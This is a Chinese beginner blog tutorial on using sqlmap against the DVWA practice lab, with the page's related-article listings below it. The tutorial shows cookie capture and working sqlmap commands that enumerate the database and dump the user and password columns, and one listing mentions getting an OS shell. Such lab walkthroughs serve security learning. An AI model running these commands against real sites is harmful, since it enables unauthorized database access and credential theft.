sqlmap入门级使用技巧

最新推荐文章于 2022-09-15 13:47:26 发布
最新推荐文章于 2022-09-15 13:47:26 发布
阅读量223 收藏
点赞数
分类专栏: web渗透 文章标签: sqlmap 入门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Deeeelete/article/details/103276657
版权

这里主要是利用dvwa环境进行工具演示

1:首选是找到sql注入的界面,也就是SQL injection界面,然后在输入框中输入任意数字,这里以1作为演示,作为一个get传入数值,url中已经显示了我们传入的变量

在这里插入图片描述2:接下来是获取页面的cookie数值,打开开发者工具,按f12开启,找到控制台console,输入document.cookie回车
在这里插入图片描述输入成功后"security=low; PHPSESSID=9tur5fv0k1m4sje2a4ugsu3u74"就是我们需要的文本,复制过来

3.打开kali终端,输入代码
sqmap -u “引号中为当前页面的url” --cookie=“本页面我们获取的cookie” --current-db

sqlmap -u "http://333.333.333.333/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=9tur5fv0k1m4sje2a4ugsu3u74" --current-db

注入成功后会出现当前数据库的名称,即dvwa,注意,–current-db是查看当前页面所属的数据库,而–dbs是查看全部的数据库
在这里插入图片描述4.查看数据库中的表

sqlmap -u "http://33.33.33.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=9tur5fv0k1m4sje2a4ugsu3u74" --tables -D dvwa

–tables是告诉工具接下来要查询表
-D代表的是数据库database,后面跟上空格和数据库名
在这里插入图片描述5.查看数据库中的列

sqlmap -u "http://33.333.33.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=9tur5fv0k1m4sje2a4ugsu3u74" --columns -T users -D dvwa

-T 后紧跟空格和表名,是table的意思,这里我们查询users表
在这里插入图片描述6.查询数据库列表中的内容

sqlmap -u "http://33.33.33.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=9tur5fv0k1m4sje2a4ugsu3u74" --dump -C user -T users -D dvwa

-C 是column,列的意思,后面紧跟空格和列名
在这里插入图片描述也可以同时查看多个列表,中间要跟逗号

sqlmap -u "http://33.333.33.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=9tur5fv0k1m4sje2a4ugsu3u74" --dump -C user,password -T users -D dvwa

sqlmap会自动解密md5
在这里插入图片描述
还有另一种sqlmap注入的方法,但需要提前对页面进行抓包,这个在以后介绍bp抓包工具的时候会补充上

Deeeelete
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQLMAP使用笔记.pdf
01-25
SQLMAP使用笔记
Sqlmap的安装与简单使用
weixin_39825906的博客
03-07 1871
以上仅是Sqlmap的一些常用简单命令使用示例,主要以入门知识为主,帮助零基础的伙伴了解一些Sqlmap的简单操作,比如:使用该工具来判断目标网站是否存在sql注入、查询获取数据库的库名表名字段名以及字段内容等信息,其他更详细的用法,可详见Sqlmap的帮助手册。
sqlmap基础
xxx9686的博客
09-15 1414
等等,总的来说这是一个很好的提高效率和速度的参数,但此参数和我们后面要介绍的--threads参数不兼容。是否试一试常用的密码呢?在本章节主要以Webug4.0的sql注入靶场进行讲解,Webug是226安全团队的开源靶场,其名称的含义是我们的漏洞库,也就是我们的靶场,在这里我们将介绍sqlmap绝大多数的常用参数,如读者有兴趣学习其他参数可以使用sqlmap.py -hh命令自行查看(注:读者如是在kali liunx中使用sqlmap只需要执行sqlmap -hh即可)。
sqlmap介绍及简单实用
我不是大牛
06-25 1万+
Sqlmap使用 一、Sqlmap简介 sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access,...
sqlmap -d mysql_sqlmap -d –os-shell 参数的使用
weixin_35540825的博客
01-21 1314
sqlmap是一款注入的神器,简介就不多说了。之前的文章也有相应的介绍,这一篇文章主要说一下-d以及–os-shell 参数的使用0×00–os-shell–os-shell也就是从注入点获得一个交互式的shell,可以执行一定的系统命令,当然要求注入点拥有文件的写权限,下面适量个针对 mssql 以及mysql的实例mssql:参数解释:–random-agent 随机使用user-agen...
python 和 sqlmap的安装使用
jiangliuzheng的专栏
01-18 6996
由于sqlmap是基于python2.5开发的,所以若要使用sqlmap,请安全python2.5以下版本,废话不多收了: 第一步:安装python2.5并添加path路径 方法/步骤 1 现在python官网上下载和自己本机匹配的python版本,看好自己的机器是64为的还是32位的 2 下载好了python安装包后双击python安装包,选择in
SQLMAP神器使用.pdf
01-05
sqlmap常见的命令使用以及实验步骤和方法
Sqlmap使用手册中文版
最新发布
01-13
Sqlmap使用手册中文版 Sqlmap是十分著名的、自动化的SQL注入工具。 sqlmap简介 sqlmap支持五种不同的注入模式: 基于布尔的盲注 基于时间的盲注 基于报错注入 联合查询注入 堆叠注入 Sqlmap是开源的自动化SQL注入...
SqlMap使用
06-24
本文档详细介绍了SqlMap使用教程,SQL注入攻击是黑客对数据库进行攻击的常用手段之一
sqlmap使用说明.pptx
04-02
介绍了 渗透测试工具 sqlmap使用方法。 对sqlmap -tamper 脚本的使用进行了演示。 burpsuite中sqlmap的插件进行了简单的介绍。
SQLmap介绍及使用(笔记)
weixin_46062722的博客
12-21 907
什么是SQLmapSQLMap是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库。 SQLMAP的强大之处在于对数据库指纹的识别、数据库枚举、数据提取、访问目标文件系统、并在获取完全的操作权限时执行任意命令,它支持以下几种独特的注入: 基于布尔类型的注入,即可根据返回页面判断条件真假的注入。 基于时间
让Python3支持SQLMap
热门推荐
Coisini的博客
05-30 1万+
Sqlmap大家应该再熟悉不过了,对于网站的注入漏洞(我们通常使用阿D,Sqlmap等工具) 在以前我讲过使用linux kali系统 中的Sqlmap使用方式,但是每次使用我们都需要打开虚拟机十分麻烦,所以本次我将讲述如何在windows环境下安装Sqlmap Sqlmap是在python 2版本下研发的,所以对于经常使用python 3的小伙伴们就十分苦恼。 [CRITICAL] inco...
sqlmap使用笔记
weixin_34253539的博客
08-27 147
sqlmap使用笔记  Sqlmap简介   官方网址:http://sqlmap.org   Github地址:https://github.com/sqlmapproject/sqlmap   中文使用说明:http://www.91ri.org/6775.html Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检...
SQLMAP简单使用
liuno0的博客
08-31 164
SQLMAP简单使用 SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Acess,IBM DB2,SQLLite,Firebird,Sybase和SAP MaxDB……SQLmap采用几种独特的SQL注...
sqlmap简单的使用步骤
xyx107的博客
03-02 897
sqlmap用于sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。注意:sqlmap只是用来检测和利用sql注入点的,使用前请先使用扫描工具扫出sql注入点。1、检测注入GET注入sqlmap -u “http://www.vuln.cn/post.php?id=1″ 默认使用level1检测全部数据库类型sqlmap -u “http://www.vuln....
sqlmap工具介绍和使用
weixin_44720762的博客
04-28 3999
之前的博客中我一直在记录网页漏洞注入,虽然从演练过程看,当我们明白sql注入的原理,渗透过程似乎很简单。但事实上,在实际的渗透当中,漏洞注入并非仅仅只是通过简单的一两次尝试就能够得到测试人员想要的答案。很多时候,它需要经过许多次繁杂的尝试。所以,要提高渗透测试的效率,单纯的依靠测试人员自身的实战经验也是远远不够的。因此,我们需要渗透工具的帮助。而sqlmap就是这样一款强大而且便于操作的渗透测试工...
Sqlmap学习笔记(零)
子曰小玖的博客
05-30 3118
https://blog.werner.wiki/sqlmap-study-notes-0/ 零、前言 这篇文章是我学习Sqlmap的用法时做的笔记,记录了Sqlmap的常见、基础用法。 学习的主要方法是阅读官方手册(sqlmap/doc/README.pdf)。 一、Sqlmap是什么 Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、O...
SQLmap工具介绍及其使用
weixin_33748818的博客
05-11 213
http://sqlmap.sourceforge.net/这是SEVEN大哥写的!:从黑防上看到他们说是有什么内部的工具,国外的注入工具,python的。想下载看看,结果是vip工具。就从百度上搜索,没有发现。看来在国内还没有流行。就直接去google上搜索去了。结果发现了这个工具。功能非常强大。我以前的想法,这个工具全都实现了。而且功能更强。新一代的强大工具。我...
kali sqmap
09-22
kali是一种基于Debian的Linux发行版,主要用于渗透测试和网络安全评估。sqlmap是kali中的一个工具,它用于检测和利用SQL注入漏洞。它可以自动探测和利用不同类型的SQL注入漏洞,并且提供了多种注入方式和选项来获取数据库中的敏感数据。使用sqlmap,你可以通过抓取页面数据或提供其他必要参数来执行注入攻击,从而获取目标数据库中的信息。 关于sqlmap的具体使用,你可以参考以下命令示例: ``` root@kali:~# sqlmap -u "http://eci-zf2.cloudecil1.ichunqiu.com" --data "uname=*&passwd=&submit=Submit" --level 3 --dump -D "sql10051008" ``` 这个命令在指定的URL上执行SQL注入测试,并使用level参数设置注入测试的深度为3,使用--dump参数导出注入点的数据库信息,-D参数指定数据库名称为sql10051008。 另外一个命令示例是: ``` sqlmap -u "http://33.333.33.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=9tur5fv0k1m4sje2a4ugsu3u74" --dump -C user,password -T users -D dvwa ``` 这个命令用于在指定的URL上执行SQL注入测试,并使用--cookie参数指定cookie信息,--dump参数导出注入点的数据库信息,-C参数指定要查询的列名,-T参数指定要查询的表名,-D参数指定要查询的数据库名称。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deeeelete

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值